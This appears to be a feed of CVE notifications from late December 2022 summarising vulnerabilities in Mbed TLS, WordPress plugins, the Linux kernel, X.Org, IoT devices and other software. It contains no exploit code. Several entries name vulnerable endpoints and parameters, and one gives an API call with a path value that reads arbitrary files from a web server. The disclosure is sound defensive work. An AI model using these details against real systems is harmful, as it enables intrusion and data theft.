🚨 CVE-2019-16910Arm Mbed TLS before 2.19.0 and Arm Mbed Crypto before 2.0.0, when deterministic ECDSA is enabled, use an RNG with insufficient entropy for blinding, which might allow an attacker to recover a private key via side-channel attacks if a victim signs the same message many times. (For Mbed TLS, the fix is also available in versions 2.7.12 and 2.16.3.)🎖@cveNotify |
|
| 2022-12-27 02:29:43 |
🚨 CVE-2019-18222The ECDSA signature implementation in ecdsa.c in Arm Mbed Crypto 2.1 and Mbed TLS through 2.19.1 does not reduce the blinded scalar before computing the inverse, which allows a local attacker to recover the private key via side-channel attacks.🎖@cveNotify |
|
| 2022-12-27 02:29:42 |
🚨 CVE-2020-10932An issue was discovered in Arm Mbed TLS before 2.16.6 and 2.7.x before 2.7.15. An attacker that can get precise enough side-channel measurements can recover the long-term ECDSA private key by (1) reconstructing the projective coordinate of the result of scalar multiplication by exploiting side channels in the conversion to affine coordinates; (2) using an attack described by Naccache, Smart, and Stern in 2003 to recover a few bits of the ephemeral scalar from those projective coordinates via several measurements; and (3) using a lattice attack to get from there to the long-term ECDSA private key used for the signatures. Typically an attacker would have sufficient access when attacking an SGX enclave and controlling the untrusted OS.🎖@cveNotify |
|
| 2022-12-27 02:29:41 |
🚨 CVE-2020-16150A Lucky 13 timing side channel in mbedtls_ssl_decrypt_buf in library/ssl_msg.c in Trusted Firmware Mbed TLS through 2.23.0 allows an attacker to recover secret key information. This affects CBC mode because of a computed time difference based on a padding length.🎖@cveNotify |
|
| 2022-12-27 02:29:40 |
🚨 CVE-2020-10941Arm Mbed TLS before 2.16.5 allows attackers to obtain sensitive information (an RSA private key) by measuring cache usage during an import.🎖@cveNotify |
|
| 2022-12-26 23:29:49 |
🚨 CVE-2018-16135The Opera Mini application 47.1.2249.129326 for Android allows remote attackers to spoof the Location Permission dialog via a crafted web site.🎖@cveNotify |
|
| 2022-12-26 23:29:48 |
🚨 CVE-2019-19030Cloud Native Computing Foundation Harbor before 1.10.3 and 2.x before 2.0.1 allows resource enumeration because unauthenticated API calls reveal (via the HTTP status code) whether a resource exists.🎖@cveNotify |
|
| 2022-12-26 23:29:47 |
🚨 CVE-2020-24600Shilpi CAPExWeb 1.1 allows SQL injection via a servlet/capexweb.cap_sendMail GET request.🎖@cveNotify |
|
| 2022-12-26 23:29:46 |
🚨 CVE-2020-28191The console in Togglz before 2.9.4 allows CSRF.🎖@cveNotify |
|
| 2022-12-26 23:29:42 |
🚨 CVE-2022-36664Password Manager for IIS 2.0 has a cross-site scripting (XSS) vulnerability via the /isapi/PasswordManager.dll ResultURL parameter.🎖@cveNotify |
|
| 2022-12-26 23:29:41 |
🚨 CVE-2019-13988Sierra Wireless MGOS before 3.15.2 and 4.x before 4.3 allows attackers to read log files via a Direct Request (aka Forced Browsing).🎖@cveNotify |
|
| 2022-12-26 23:29:40 |
🚨 CVE-2019-14802HashiCorp Nomad 0.5.0 through 0.9.4 (fixed in 0.9.5) reveals unintended environment variables to the rendering task during template rendering, aka GHSA-6hv3-7c34-4hx8. This applies to nomad/client/allocrunner/taskrunner/template.🎖@cveNotify |
|
| 2022-12-26 23:29:39 |
🚨 CVE-2019-18177In certain Citrix products, information disclosure can be achieved by an authenticated VPN user when there is a configured SSL VPN endpoint. This affects Citrix ADC and Citrix Gateway 13.0-58.30 and later releases before the CTX276688 update.🎖@cveNotify |
|
| 2022-12-26 23:29:38 |
🚨 CVE-2019-19705Realtek Audio Drivers for Windows, as used on the Lenovo ThinkPad X1 Carbon 20A7, 20A8, 20BS, and 20BT before 6.0.8882.1 and 20KH and 20KG before 6.0.8907.1 (and on many other Lenovo and non-Lenovo products), mishandles DLL preloading.🎖@cveNotify |
|
| 2022-12-26 22:29:45 |
🚨 CVE-2019-9579An issue was discovered in Illumos in Nexenta NexentaStor 4.0.5 and 5.1.2, and other products. The SMB server allows an attacker to have unintended access, e.g., an attacker with WRITE_XATTR can change permissions. This occurs because of a combination of three factors: ZFS extended attributes are used to implement NT named streams, the SMB protocol requires implementations to have open handle semantics similar to those of NTFS, and the SMB server passes along certain attribute requests to the underlying object (i.e., they are not considered to be requests that pertain to the named stream).🎖@cveNotify |
|
| 2022-12-26 22:29:44 |
🚨 CVE-2020-11101Sierra Wireless AirLink Mobility Manager (AMM) before 2.17 mishandles sessions and thus an unauthenticated attacker can obtain a login session with administrator privileges.🎖@cveNotify |
|
| 2022-12-26 22:29:43 |
🚨 CVE-2021-4281A vulnerability was found in Brave UX for-the-badge and classified as critical. Affected by this issue is some unknown functionality of the file .github/workflows/combine-prs.yml. The manipulation leads to os command injection. The name of the patch is 55b5a234c0fab935df5fb08365bc8fe9c37cf46b. It is recommended to apply a patch to fix this issue. VDB-216842 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-26 22:29:40 |
🚨 CVE-2020-12067In Pilz PMC programming tool 3.x before 3.5.17 (based on CODESYS Development System), a user's password may be changed by an attacker without knowledge of the current password.🎖@cveNotify |
|
| 2022-12-26 22:29:39 |
🚨 CVE-2022-42863A memory corruption issue was addressed with improved state management. This issue is fixed in Safari 16.2, tvOS 16.2, macOS Ventura 13.1, iOS 16.2 and iPadOS 16.2, watchOS 9.2. Processing maliciously crafted web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2022-12-26 22:29:38 |
🚨 CVE-2022-42856A type confusion issue was addressed with improved state handling. This issue is fixed in Safari 16.2, tvOS 16.2, macOS Ventura 13.1, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.1.2. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.1..🎖@cveNotify |
|
| 2022-12-26 16:29:57 |
🚨 CVE-2022-4153The Contest Gallery WordPress plugin before 19.1.5.1, Contest Gallery Pro WordPress plugin before 19.1.5.1 do not escape the upload[] POST parameter before concatenating it to an SQL query in get-data-create-upload-v10.php. This may allow malicious users with at least author privilege to leak sensitive information from the site's database.🎖@cveNotify |
|
| 2022-12-26 16:29:56 |
🚨 CVE-2022-4154The Contest Gallery Pro WordPress plugin before 19.1.5 does not escape the wp_user_id GET parameter before concatenating it to an SQL query in management-show-user.php. This may allow malicious users with at administrator privileges (i.e. on multisite WordPress configurations) to leak sensitive information from the site's database.🎖@cveNotify |
|
| 2022-12-26 16:29:55 |
🚨 CVE-2022-4156The Contest Gallery WordPress plugin before 19.1.5.1, Contest Gallery Pro WordPress plugin before 19.1.5.1 do not escape the user_id POST parameter before concatenating it to an SQL query in ajax-functions-backend.php. This may allow malicious users with at least author privilege to leak sensitive information from the site's database.🎖@cveNotify |
|
| 2022-12-26 16:29:51 |
🚨 CVE-2022-4157The Contest Gallery WordPress plugin before 19.1.5.1, Contest Gallery Pro WordPress plugin before 19.1.5.1 do not escape the cg_option_id POST parameter before concatenating it to an SQL query in export-votes-all.php. This may allow malicious users with administrator privileges (i.e. on multisite WordPress configurations) to leak sensitive information from the site's database.🎖@cveNotify |
|
| 2022-12-26 16:29:50 |
🚨 CVE-2022-4159The Contest Gallery WordPress plugin before 19.1.5.1, Contest Gallery Pro WordPress plugin before 19.1.5.1 do not escape the cg_id POST parameter before concatenating it to an SQL query in 0_change-gallery.php. This may allow malicious users with at least author privilege to leak sensitive information from the site's database.🎖@cveNotify |
|
| 2022-12-26 16:29:49 |
🚨 CVE-2022-4160The Contest Gallery WordPress plugin before 19.1.5.1, Contest Gallery Pro WordPress plugin before 19.1.5.1 do not escape the cg_copy_id POST parameter before concatenating it to an SQL query in cg-copy-comments.php and cg-copy-rating.php. This may allow malicious users with at least author privilege to leak sensitive information from the site's database.🎖@cveNotify |
|
| 2022-12-26 16:29:48 |
🚨 CVE-2022-4161The Contest Gallery WordPress plugin before 19.1.5.1, Contest Gallery Pro WordPress plugin before 19.1.5.1 do not escape the cg_copy_start POST parameter before concatenating it to an SQL query in copy-gallery-images.php. This may allow malicious users with at least author privilege to leak sensitive information from the site's database.🎖@cveNotify |
|
| 2022-12-26 16:29:45 |
🚨 CVE-2022-4162The Contest Gallery WordPress plugin before 19.1.5.1, Contest Gallery Pro WordPress plugin before 19.1.5.1 do not escape the cg_row POST parameter before concatenating it to an SQL query in 3_row-order.php. This may allow malicious users with at least author privilege to leak sensitive information from the site's database.🎖@cveNotify |
|
| 2022-12-26 16:29:44 |
🚨 CVE-2022-4163The Contest Gallery WordPress plugin before 19.1.5.1, Contest Gallery Pro WordPress plugin before 19.1.5.1 do not escape the cg_deactivate and cg_activate POST parameters before concatenating it to an SQL query in 2_deactivate.php and 4_activate.php, respectively. This may allow malicious users with at least author privilege to leak sensitive information from the site's database.🎖@cveNotify |
|
| 2022-12-26 16:29:43 |
🚨 CVE-2022-4165The Contest Gallery WordPress plugin before 19.1.5.1, Contest Gallery Pro WordPress plugin before 19.1.5.1 do not escape the cg_order POST parameter before concatenating it to an SQL query in order-custom-fields-with-and-without-search.php. This may allow malicious users with at least author privilege to leak sensitive information from the site's database.🎖@cveNotify |
|
| 2022-12-26 16:29:42 |
🚨 CVE-2022-4166The Contest Gallery WordPress plugin before 19.1.5.1, Contest Gallery Pro WordPress plugin before 19.1.5.1 do not escape the addCountS POST parameter before concatenating it to an SQL query in 4_activate.php. This may allow malicious users with at least author privilege to leak sensitive information from the site's database.🎖@cveNotify |
|
| 2022-12-26 16:29:38 |
🚨 CVE-2022-4226The Simple Basic Contact Form WordPress plugin before 20221201 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2022-12-26 16:29:37 |
🚨 CVE-2022-4227The Booster for WooCommerce WordPress plugin before 5.6.3, Booster Plus for WooCommerce WordPress plugin before 6.0.0, Booster Elite for WooCommerce WordPress plugin before 6.0.0 do not escape some URLs and parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting🎖@cveNotify |
|
| 2022-12-26 16:29:36 |
🚨 CVE-2022-4239The Workreap WordPress theme before 2.6.4 does not verify that an addon service belongs to the user issuing the request, or indeed that it is an addon service, when processing the workreap_addons_service_remove action, allowing any user to delete any post by knowing or guessing the id.🎖@cveNotify |
|
| 2022-12-26 16:29:35 |
🚨 CVE-2022-4242The WP Google Review Slider WordPress plugin before 11.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2022-12-26 12:30:05 |
🚨 CVE-2022-4742A vulnerability, which was classified as critical, has been found in json-pointer. Affected by this issue is the function set of the file index.js. The manipulation leads to improperly controlled modification of object prototype attributes ('prototype pollution'). The attack may be launched remotely. The name of the patch is 859c9984b6c407fc2d5a0a7e47c7274daa681941. It is recommended to apply a patch to fix this issue. VDB-216794 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-26 12:30:03 |
🚨 CVE-2019-25085A vulnerability was found in GNOME gvdb. It has been classified as critical. This affects the function gvdb_table_write_contents_async of the file gvdb-builder.c. The manipulation leads to use after free. It is possible to initiate the attack remotely. The name of the patch is d83587b2a364eb9a9a53be7e6a708074e252de14. It is recommended to apply a patch to fix this issue. The identifier VDB-216789 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-26 12:30:02 |
🚨 CVE-2021-30134php-mod/curl (a wrapper of the PHP cURL extension) before 2.3.2 allows XSS via the post_file_path_upload.php key parameter and the POST data to post_multidimensional.php.🎖@cveNotify |
|
| 2022-12-26 12:30:00 |
🚨 CVE-2021-35065The glob-parent package before 6.0.1 for Node.js allows ReDoS (regular expression denial of service) attacks against the enclosure regular expression.🎖@cveNotify |
|
| 2022-12-26 12:29:59 |
🚨 CVE-2021-35951fastrack Reflex 2.0 W307S_REFLEX_v90.89 Activity Tracker allows an Unauthenticated Remote attacker to send a malicious firmware update via BLE and brick the device.🎖@cveNotify |
|
| 2022-12-26 12:29:58 |
🚨 CVE-2021-35952fastrack Reflex 2.0 W307S_REFLEX_v90.89 Activity Tracker allows a Remote attacker to change the time, date, and month via Bluetooth LE Characteristics on handle 0x0017.🎖@cveNotify |
|
| 2022-12-26 12:29:56 |
🚨 CVE-2021-35953fastrack Reflex 2.0 W307S_REFLEX_v90.89 Activity Tracker allows a Remote attacker to cause a Denial of Service (device outage) via crafted choices of the last three bytes of a characteristic value.🎖@cveNotify |
|
| 2022-12-26 12:29:55 |
🚨 CVE-2021-35954fastrack Reflex 2.0 W307S_REFLEX_v90.89 Activity Tracker allows physically proximate attackers to dump the firmware, flash custom malicious firmware, and brick the device via the Serial Wire Debug (SWD) feature.🎖@cveNotify |
|
| 2022-12-26 12:29:53 |
🚨 CVE-2021-38561golang.org/x/text/language in golang.org/x/text before 0.3.7 can panic with an out-of-bounds read during BCP 47 language tag parsing. Index calculation is mishandled. If parsing untrusted user input, this can be used as a vector for a denial-of-service attack.🎖@cveNotify |
|
| 2022-12-26 12:29:51 |
🚨 CVE-2021-39369In Philips (formerly Carestream) Vue MyVue PACS through 12.2.x.x, the VideoStream function allows Path Traversal by authenticated users to access files stored outside of the web root.🎖@cveNotify |
|
| 2022-12-26 12:29:50 |
🚨 CVE-2021-43395An issue was discovered in illumos before f859e7171bb5db34321e45585839c6c3200ebb90, OmniOS Community Edition r151038, OpenIndiana Hipster 2021.04, and SmartOS 20210923. A local unprivileged user can cause a deadlock and kernel panic via crafted rename and rmdir calls on tmpfs filesystems. Oracle Solaris 10 and 11 is also affected.🎖@cveNotify |
|
| 2022-12-26 12:29:49 |
🚨 CVE-2021-44856An issue was discovered in MediaWiki before 1.35.5, 1.36.x before 1.36.3, and 1.37.x before 1.37.1. A title blocked by AbuseFilter can be created via Special:ChangeContentModel due to the mishandling of the EditFilterMergedContent hook return value.🎖@cveNotify |
|
| 2022-12-26 12:29:47 |
🚨 CVE-2022-26964Weak password derivation for export in Devolutions Remote Desktop Manager before 2022.1 allows information disclosure via a password brute-force attack. An error caused base64 to be decoded.🎖@cveNotify |
|
| 2022-12-26 12:29:46 |
🚨 CVE-2022-26969In Directus before 9.7.0, the default settings of CORS_ORIGIN and CORS_ENABLED are true.🎖@cveNotify |
|
| 2022-12-26 12:29:44 |
🚨 CVE-2022-30260Emerson DeltaV Distributed Control System (DCS) has insufficient verification of firmware integrity (an inadequate checksum approach, and no signature). This affects versions before 14.3 of DeltaV M-series, DeltaV S-series, DeltaV P-series, DeltaV SIS, and DeltaV CIOC/EIOC/WIOC IO cards.🎖@cveNotify |
|
| 2022-12-26 12:29:43 |
🚨 CVE-2022-41765An issue was discovered in MediaWiki before 1.35.8, 1.36.x and 1.37.x before 1.37.5, and 1.38.x before 1.38.3. HTMLUserTextField exposes the existence of hidden users.🎖@cveNotify |
|
| 2022-12-26 12:29:42 |
🚨 CVE-2022-41767An issue was discovered in MediaWiki before 1.35.8, 1.36.x and 1.37.x before 1.37.5, and 1.38.x before 1.38.3. When changes made by an IP address are reassigned to a user (using reassignEdits.php), the changes will still be attributed to the IP address on Special:Contributions when doing a range lookup.🎖@cveNotify |
|
| 2022-12-26 07:29:52 |
🚨 CVE-2022-46341A vulnerability was found in X.Org. This security flaw occurs because the handler for the XIPassiveUngrab request accesses out-of-bounds memory when invoked with a high keycode or button code. This issue can lead to local privileges elevation on systems where the X server is running privileged and remote code execution for ssh X forwarding sessions.🎖@cveNotify |
|
| 2022-12-26 07:29:51 |
🚨 CVE-2022-46342A vulnerability was found in X.Org. This security flaw occurs because the handler for the XvdiSelectVideoNotify request may write to memory after it has been freed. This issue can lead to local privileges elevation on systems where the X se🎖@cveNotify |
|
| 2022-12-26 07:29:50 |
🚨 CVE-2022-46344A vulnerability was found in X.Org. This security flaw occurs because the handler for the XIChangeProperty request has a length-validation issues, resulting in out-of-bounds memory reads and potential information disclosure. This issue can lead to local privileges elevation on systems where the X server is running privileged and remote code execution for ssh X forwarding sessions.🎖@cveNotify |
|
| 2022-12-26 07:29:46 |
🚨 CVE-2022-4283A vulnerability was found in X.Org. This security flaw occurs because the XkbCopyNames function left a dangling pointer to freed memory, resulting in out-of-bounds memory access on subsequent XkbGetKbdByName requests.. This issue can lead to local privileges elevation on systems where the X server is running privileged and remote code execution for ssh X forwarding sessions.🎖@cveNotify |
|
| 2022-12-26 07:29:45 |
🚨 CVE-2022-37308OX App Suite through 7.10.6 allows XSS via HTML in text/plain e-mail messages.🎖@cveNotify |
|
| 2022-12-26 07:29:44 |
🚨 CVE-2022-35409An issue was discovered in Mbed TLS before 2.28.1 and 3.x before 3.2.0. In some configurations, an unauthenticated attacker can send an invalid ClientHello message to a DTLS server that causes a heap-based buffer over-read of up to 255 bytes. This can cause a server crash or possibly information disclosure based on error responses. Affected configurations have MBEDTLS_SSL_DTLS_CLIENT_PORT_REUSE enabled and MBEDTLS_SSL_IN_CONTENT_LEN less than a threshold that depends on the configuration: 258 bytes if using mbedtls_ssl_cookie_check, and possibly up to 571 bytes with a custom cookie check function.🎖@cveNotify |
|
| 2022-12-26 07:29:43 |
🚨 CVE-2021-43666A Denial of Service vulnerability exists in mbed TLS 3.0.0 and earlier in the mbedtls_pkcs12_derivation function when an input password's length is 0.🎖@cveNotify |
|
| 2022-12-26 07:29:39 |
🚨 CVE-2020-36475An issue was discovered in Mbed TLS before 2.25.0 (and before 2.16.9 LTS and before 2.7.18 LTS). The calculations performed by mbedtls_mpi_exp_mod are not limited; thus, supplying overly large parameters could lead to denial of service when generating Diffie-Hellman key pairs.🎖@cveNotify |
|
| 2022-12-26 07:29:38 |
🚨 CVE-2020-36476An issue was discovered in Mbed TLS before 2.24.0 (and before 2.16.8 LTS and before 2.7.17 LTS). There is missing zeroization of plaintext buffers in mbedtls_ssl_read to erase unused application data from memory.🎖@cveNotify |
|
| 2022-12-26 07:29:37 |
🚨 CVE-2020-36421An issue was discovered in Arm Mbed TLS before 2.23.0. Because of a side channel in modular exponentiation, an RSA private key used in a secure enclave could be disclosed.🎖@cveNotify |
|
| 2022-12-26 01:29:41 |
🚨 CVE-2022-47943An issue was discovered in ksmbd in the Linux kernel 5.15 through 5.19 before 5.19.2. There is an out-of-bounds read and OOPS for SMB2_WRITE, when there is a large length in the zero DataOffset case.🎖@cveNotify |
|
| 2022-12-26 01:29:38 |
🚨 CVE-2022-47938An issue was discovered in ksmbd in the Linux kernel 5.15 through 5.19 before 5.19.2. fs/ksmbd/smb2misc.c has an out-of-bounds read and OOPS for SMB2_TREE_CONNECT.🎖@cveNotify |
|
| 2022-12-26 01:29:37 |
🚨 CVE-2022-47940An issue was discovered in ksmbd in the Linux kernel 5.15 through 5.18 before 5.18.18. fs/ksmbd/smb2pdu.c lacks length validation in the non-padding case in smb2_write.🎖@cveNotify |
|
| 2022-12-26 01:29:36 |
🚨 CVE-2022-47942An issue was discovered in ksmbd in the Linux kernel 5.15 through 5.19 before 5.19.2. There is a heap-based buffer overflow in set_ntacl_dacl, related to use of SMB2_QUERY_INFO_HE after a malformed SMB2_SET_INFO_HE command.🎖@cveNotify |
|
| 2022-12-25 22:29:56 |
🚨 CVE-2020-36630A vulnerability was found in FreePBX cdr 14.0. It has been classified as critical. This affects the function ajaxHandler of the file ucp/Cdr.class.php. The manipulation of the argument limit/offset leads to sql injection. Upgrading to version 14.0.5.21 is able to address this issue. The name of the patch is f1a9eea2dfff30fb99d825bac194a676a82b9ec8. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216771.🎖@cveNotify |
|
| 2022-12-25 22:29:53 |
🚨 CVE-2020-36631A vulnerability was found in barronwaffles dwc_network_server_emulator. It has been declared as critical. This vulnerability affects the function update_profile of the file gamespy/gs_database.py. The manipulation of the argument firstname/lastname leads to sql injection. The attack can be initiated remotely. The name of the patch is f70eb21394f75019886fbc2fb536de36161ba422. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-216772.🎖@cveNotify |
|
| 2022-12-25 22:29:52 |
🚨 CVE-2021-4279A vulnerability has been found in Starcounter-Jack JSON-Patch up to 3.1.0 and classified as problematic. This vulnerability affects unknown code. The manipulation leads to improperly controlled modification of object prototype attributes ('prototype pollution'). The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.1.1 is able to address this issue. The name of the patch is 7ad6af41eabb2d799f698740a91284d762c955c9. It is recommended to upgrade the affected component. VDB-216778 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-25 22:29:51 |
🚨 CVE-2022-4736A vulnerability was found in Venganzas del Pasado and classified as problematic. Affected by this issue is some unknown functionality. The manipulation of the argument the_title leads to cross site scripting. The attack may be launched remotely. The name of the patch is 62339b2ec445692c710b804bdf07aef4bd247ff7. It is recommended to apply a patch to fix this issue. VDB-216770 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-25 22:29:47 |
🚨 CVE-2022-4738A vulnerability classified as problematic has been found in SourceCodester Blood Bank Management System 1.0. Affected is an unknown function of the file index.php?page=users of the component User Registration Handler. The manipulation of the argument Name leads to cross site scripting. It is possible to launch the attack remotely. VDB-216774 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-25 22:29:46 |
🚨 CVE-2022-4740A vulnerability, which was classified as problematic, has been found in kkFileView. Affected by this issue is the function setWatermarkAttribute of the file /picturesPreview. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-216776.🎖@cveNotify |
|
| 2022-12-25 22:29:45 |
🚨 CVE-2022-4741A vulnerability was found in docconv up to 1.2.0 and classified as problematic. This issue affects the function ConvertDocx/ConvertODT/ConvertPages/ConvertXML/XMLToText. The manipulation leads to uncontrolled memory allocation. The attack may be initiated remotely. Upgrading to version 1.2.1 is able to address this issue. The name of the patch is 42bcff666855ab978e67a9041d0cdea552f20301. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216779.🎖@cveNotify |
|
| 2022-12-25 22:29:42 |
🚨 CVE-2021-4264A vulnerability was found in LinkedIn dustjs up to 2.x and classified as problematic. Affected by this issue is some unknown functionality. The manipulation leads to improperly controlled modification of object prototype attributes ('prototype pollution'). The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.0.0 is able to address this issue. The name of the patch is ddb6523832465d38c9d80189e9de60519ac307c3. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-216464.🎖@cveNotify |
|
| 2022-12-25 22:29:41 |
🚨 CVE-2022-40005Intelbras WiFiber 120AC inMesh before 1-1-220826 allows command injection by authenticated users, as demonstrated by the /boaform/formPing6 and /boaform/formTracert URIs for ping and traceroute.🎖@cveNotify |
|
| 2022-12-25 22:29:40 |
🚨 CVE-2022-41318A buffer over-read was discovered in libntlmauth in Squid 2.5 through 5.6. Due to incorrect integer-overflow protection, the SSPI and SMB authentication helpers are vulnerable to reading unintended memory locations. In some configurations, cleartext credentials from these locations are sent to a client. This is fixed in 5.7.🎖@cveNotify |
|
| 2022-12-25 19:29:41 |
🚨 CVE-2019-25084A vulnerability, which was classified as problematic, has been found in Hide Files on GitHub up to 2.x. This issue affects the function addEventListener of the file extension/options.js. The manipulation leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 3.0.0 is able to address this issue. The name of the patch is 9de0c57df81db1178e0e79431d462f6d9842742e. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216767.🎖@cveNotify |
|
| 2022-12-25 14:29:49 |
🚨 CVE-2022-4731A vulnerability, which was classified as problematic, was found in myapnea up to 29.0.x. Affected is an unknown function of the component Title Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 29.1.0 is able to address this issue. The name of the patch is 99934258530d761bd5d09809bfa6c14b598f8d18. It is recommended to upgrade the affected component. VDB-216750 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-25 14:29:47 |
🚨 CVE-2020-36627A vulnerability was found in Macaron i18n. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file i18n.go. The manipulation leads to open redirect. The attack can be launched remotely. Upgrading to version 0.5.0 is able to address this issue. The name of the patch is 329b0c4844cc16a5a253c011b55180598e707735. It is recommended to upgrade the affected component. The identifier VDB-216745 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-25 14:29:46 |
🚨 CVE-2020-36628A vulnerability classified as critical has been found in Calsign APDE. This affects the function handleExtract of the file APDE/src/main/java/com/calsignlabs/apde/build/dag/CopyBuildTask.java of the component ZIP File Handler. The manipulation leads to path traversal. Upgrading to version 0.5.2-pre2-alpha is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216747.🎖@cveNotify |
|
| 2022-12-25 14:29:45 |
🚨 CVE-2020-36629A vulnerability classified as critical was found in SimbCo httpster. This vulnerability affects the function fs.realpathSync of the file src/server.coffee. The manipulation leads to path traversal. The exploit has been disclosed to the public and may be used. The name of the patch is d3055b3e30b40b65d30c5a06d6e053dffa7f35d0. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-216748.🎖@cveNotify |
|
| 2022-12-25 14:29:43 |
🚨 CVE-2021-4276** DISPUTED ** ** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** ** DISPUTED ** A vulnerability was found in dns-stats hedgehog. It has been rated as problematic. Affected by this issue is the function DSCIOManager::dsc_import_input_from_source of the file src/DSCIOManager.cpp. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. The name of the patch is 58922c345d3d1fe89bb2020111873a3e07ca93ac. It is recommended to apply a patch to fix this issue. VDB-216746 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: We do assume that the Data Manager server can only be accessed by authorised users. Because of this, we don’t believe this specific attack is possible without such a compromise of the Data Manager server.🎖@cveNotify |
|
| 2022-12-25 14:29:42 |
🚨 CVE-2021-4277A vulnerability, which was classified as problematic, has been found in fredsmith utils. This issue affects some unknown processing of the file screenshot_sync of the component Filename Handler. The manipulation leads to predictable from observable state. The name of the patch is dbab1b66955eeb3d76b34612b358307f5c4e3944. It is recommended to apply a patch to fix this issue. The identifier VDB-216749 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-25 11:29:46 |
🚨 CVE-2022-42898PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."🎖@cveNotify |
|
| 2022-12-25 07:30:02 |
🚨 CVE-2022-44016An issue was discovered in Simmeth Lieferantenmanager before 5.6. An attacker can download arbitrary files from the web server by abusing an API call: /DS/LM_API/api/ConfigurationService/GetImages with an '"ImagesPath":"C:\\"' value.🎖@cveNotify |
|
| 2022-12-25 07:30:01 |
🚨 CVE-2022-44017An issue was discovered in Simmeth Lieferantenmanager before 5.6. Due to errors in session management, an attacker can log back into a victim's account after the victim logged out - /LMS/LM/#main can be used for this. This is due to the credentials not being cleaned from the local storage after logout.🎖@cveNotify |
|
| 2022-12-25 07:30:00 |
🚨 CVE-2022-44381Snipe-IT through 6.0.14 allows attackers to check whether a user account exists because of response variations in a /password/reset request.🎖@cveNotify |
|
| 2022-12-25 07:29:59 |
🚨 CVE-2022-44640Heimdal before 7.7.1 allows remote attackers to execute arbitrary code because of an invalid free in the ASN.1 codec used by the Key Distribution Center (KDC).🎖@cveNotify |
|
| 2022-12-25 07:29:55 |
🚨 CVE-2022-45893Planet eStream before 6.72.10.07 allows a low-privileged user to gain access to administrative and high-privileged user accounts by changing the value of the ON cookie. A brute-force attack can calculate a value that provides permanent access.🎖@cveNotify |
|
| 2022-12-25 07:29:54 |
🚨 CVE-2022-45894GetFile.aspx in Planet eStream before 6.72.10.07 allows ..\ directory traversal to read arbitrary local files.🎖@cveNotify |
|
| 2022-12-25 07:29:53 |
🚨 CVE-2022-45896Planet eStream before 6.72.10.07 allows unauthenticated upload of arbitrary files: Choose a Video / Related Media or Upload Document. Upload2.ashx can be used, or Ajax.asmx/ProcessUpload2. This leads to remote code execution.🎖@cveNotify |
|
| 2022-12-25 07:29:49 |
🚨 CVE-2022-45890In Planet eStream before 6.72.10.07, a Reflected Cross-Site Scripting (XSS) vulnerability exists via any metadata filter field (e.g., search within Default.aspx with the r or fo parameter).🎖@cveNotify |
|
| 2022-12-25 07:29:48 |
🚨 CVE-2022-45892In Planet eStream before 6.72.10.07, multiple Stored Cross-Site Scripting (XSS) vulnerabilities exist: Disclaimer, Search Function, Comments, Batch editing tool, Content Creation, Related Media, Create new user, and Change Username.🎖@cveNotify |
|
| 2022-12-25 07:29:47 |
🚨 CVE-2022-45934An issue was discovered in the Linux kernel through 6.0.10. l2cap_config_req in net/bluetooth/l2cap_core.c has an integer wraparound via L2CAP_CONF_REQ packets.🎖@cveNotify |
|
| 2022-12-25 07:29:43 |
🚨 CVE-2022-46540Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the entrys parameter at /goform/addressNat.🎖@cveNotify |
|
| 2022-12-25 07:29:42 |
🚨 CVE-2022-46541Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the ssid parameter at /goform/fast_setting_wifi_set.🎖@cveNotify |
|
| 2022-12-25 02:29:37 |
